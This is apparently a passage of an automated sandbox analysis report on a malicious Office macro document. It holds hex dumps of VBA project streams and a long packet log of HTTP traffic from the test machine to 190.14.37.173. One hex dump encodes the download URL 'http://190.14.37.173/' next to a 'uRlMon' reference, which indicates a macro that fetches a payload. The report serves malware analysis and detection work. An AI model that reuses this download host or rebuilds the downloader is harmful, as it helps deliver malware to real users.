      Data Raw:00 02 28 00 28 00 00 00 15 00 00 80 68 74 74 70 3a 2f 2f 31 39 30 2e 31 34 2e 33 37 2e 31 37 33 2f 01 00 00 00 00 00 00 00 00 00 00 00 02 18 00 35 00 00 00 06 00 00 80 a5 00 00 00 cc 02 00 00 54 61 68 6f 6d 61 03 18 00 02 18 00 28 00 00 00 06 00 00 80 75 52 6c 4d 6f 6e 00 00 00 00 00 00 d4 00 00 00 00 02 18 00 35 00 00 00 06 00 00 80 a5 00 00 00 cc 02 00 00 54 61 68 6f 6d 61 01 f4
      Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 3819
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
      File Type:data
      Stream Size:3819
      Entropy:4.49037503963
      Base64 Encoded:False
      Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
      Data Raw:cc 61 b5 00 00 03 00 ff 19 04 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
      Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0, File Type: data, Stream Size: 2035
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_0
      File Type:data
      Stream Size:2035
      Entropy:3.42846113886
      Base64 Encoded:False
      Data ASCII:. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ X . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . . . $ . . . . D . Q . . . . = s . . . . . . . .
      Data Raw:93 4b 2a b5 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 02 00 00 00 00 00 01 00 02 00 02 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00 7e 02 00 00 00 00 00 00 7e 02 00 00 00
      Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_1, File Type: data, Stream Size: 138
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_1
      File Type:data
      Stream Size:138
      Entropy:1.48462480805
      Base64 Encoded:False
      Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j . . . . . . . . . . . . . . .
      Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 11 00 00 00 00 00 00 00 00 00 03 00 ff ff ff ff ff ff ff ff 6a 00 00 00 00 00
      Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_2, File Type: data, Stream Size: 264
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_2
      File Type:data
      Stream Size:264
      Entropy:1.9985725068
      Base64 Encoded:False
      Data ASCII:r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . . S . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Z . . . N . . . . . . .
      Data Raw:72 55 80 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 00 00 00 7e 78 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 10 00 00 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
      Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_3, File Type: data, Stream Size: 256
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_3
      File Type:data
      Stream Size:256
      Entropy:1.80540314317
      Base64 Encoded:False
      Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . a . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . .
      Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 10 00 00 00 08 00 38 00 f1 00 00 00 00 00 00 00 00 00 02 00 00 00 00 60 00 00 fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
      Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: SVR2 executable (USS/370) not stripped - version 12587540, Stream Size: 865
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/dir
      File Type:SVR2 executable (USS/370) not stripped - version 12587540
      Stream Size:865
      Entropy:6.55213343791
      Base64 Encoded:True
      Data ASCII:. ] . . . . . . . . . . 0 . J . . . . H . . H . . . . . . H . . . d . . . . . . . . V B A P r @ o j e c t . . . . T . @ . . . . . = . . . + . r . . . . . . . . . v . A c . . . . J < . . . . . . 9 s t d o l . e > . . s . t . d . . o . l . e . . . . h . % ^ . . * \\ G . { 0 0 0 2 0 4 3 . 0 - . . . . C . . . . . . . 0 0 4 6 } # 2 . . 0 # 0 # C : \\ W . i n d o w s \\ S . y s t e m 3 2 \\ . . e 2 . t l b # O . L E A u t o m . a t i o n . 0 . . . E O f f i c . E O . . f . . i . c . E . . . . . . . . E 2 D F 8 D
      Data Raw:01 5d b3 80 01 00 04 00 00 00 03 00 30 aa 4a 02 90 02 00 48 02 02 48 09 00 c0 12 14 06 48 03 00 01 64 e3 04 04 04 00 0a 00 84 56 42 41 50 72 40 6f 6a 65 63 74 05 00 1a 00 54 00 40 02 0a 06 02 0a 3d 02 0a 07 2b 02 72 01 14 08 06 12 09 02 12 ba 76 a0 41 63 02 00 0c 02 4a 3c 02 0a 04 16 00 01 39 73 74 64 6f 6c 04 65 3e 02 19 73 00 74 00 64 00 00 6f 00 6c 00 65 00 0d 14 00 68 00 25 5e

      Network Behavior

      Network Port Distribution

      TCP Packets

      TimestampSource PortDest PortSource IPDest IP
      Sep 24, 2021 15:59:27.614068985 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:27.817226887 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:27.817347050 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:27.818121910 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:28.029831886 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:28.861392021 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:28.861428022 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:28.861438990 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:28.861450911 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:28.861462116 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:28.861474991 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:28.861483097 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:28.861494064 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:28.861505032 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:28.861516953 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:28.861849070 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:28.875869989 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.068849087 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.068880081 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.068892956 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.068908930 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.068922043 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.068938971 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.068957090 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.068974018 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.068989992 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.069005966 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.069025040 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.069042921 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.069058895 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.069073915 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.069089890 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.069103003 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.069118023 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.069133043 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.069152117 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.069169044 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.069197893 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.069231033 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.069236040 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.072541952 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.284091949 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.284166098 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.284193039 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.284216881 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.284239054 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.284262896 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.284284115 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.284302950 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.284321070 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.284337997 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.284356117 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.284365892 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.284373045 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.284389019 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.284390926 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.284404993 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.284420967 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.284440041 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.284455061 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.284457922 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.284473896 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.284490108 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.284506083 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.284512997 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.284521103 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.284537077 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.284563065 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.284578085 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.284579039 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.284609079 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.284646034 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.284950972 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.285017014 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.285069942 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.285068989 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.285093069 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.285131931 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.285142899 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.285156965 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.285180092 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.285196066 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.285202026 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.285226107 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.285243034 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.285244942 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.285257101 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.285263062 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.285284042 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.285307884 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.285315037 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.285331011 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.285346031 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.285368919 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.285392046 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.286144018 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.287856102 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.287879944 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.287895918 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.287969112 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.287986994 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.295012951 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.500189066 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.500226974 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.500243902 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.500264883 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.500284910 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.500307083 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.500328064 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.500354052 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.500375986 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.500392914 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.500396013 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.500417948 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.500418901 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.500441074 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.500452042 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.500463009 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.500480890 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.500485897 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.500508070 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.500515938 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.500533104 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.500552893 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.500556946 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.500579119 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.500587940 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.500602007 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.500617027 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.500626087 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.500648975 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.500648975 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.500670910 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.500674009 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.500694036 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.500703096 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.500719070 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.500734091 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.500741959 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.500762939 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.500762939 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.500785112 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.500793934 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.500807047 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.500823021 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.500838041 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.500858068 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.500870943 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.500880003 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.500895977 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.500905991 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.500925064 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.500930071 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.500950098 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.500953913 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.500971079 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.500986099 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.500999928 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.501019001 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.501025915 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.501039028 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.501044035 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.501063108 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.501066923 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.501087904 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.501097918 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.501111031 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.501312971 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.503722906 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.688043118 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.688080072 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.688092947 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.688108921 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.688122034 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.688138008 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.688318968 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.716057062 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.716084957 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.716104984 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.716123104 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.716140985 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.716160059 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.716178894 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.716202021 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.716279984 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.716303110 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.716378927 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.716466904 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.719002962 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.719029903 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.719060898 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.719085932 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.719094992 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.719109058 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.719158888 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.719160080 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.719189882 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.719218969 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.719227076 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.719237089 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.719244957 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.719263077 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.719273090 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.719330072 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.721795082 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.894299984 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.894365072 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.894403934 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.894440889 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.894488096 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.894534111 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.894551039 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.894572973 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.894577026 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.894579887 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.894628048 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.894634962 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.894669056 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.894680023 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.894706964 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.894723892 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.894746065 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.894757032 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.894784927 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.894797087 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.894823074 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.894835949 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.894862890 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.894874096 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.894900084 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.894922018 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.894943953 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.894948006 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.894992113 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.895003080 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.895030022 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.895040989 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.895070076 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.895080090 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.895107985 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.895142078 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.895200014 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.895215988 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.895262957 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.895265102 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.895313978 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.898407936 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.898459911 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.898495913 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.898525000 CEST4916780192.168.2.22190.14.37.173
      Sep 24, 2021 15:59:29.898534060 CEST8049167190.14.37.173192.168.2.22
      Sep 24, 2021 15:59:29.898556948 CEST4916780192.168.2.22190.14.37.173
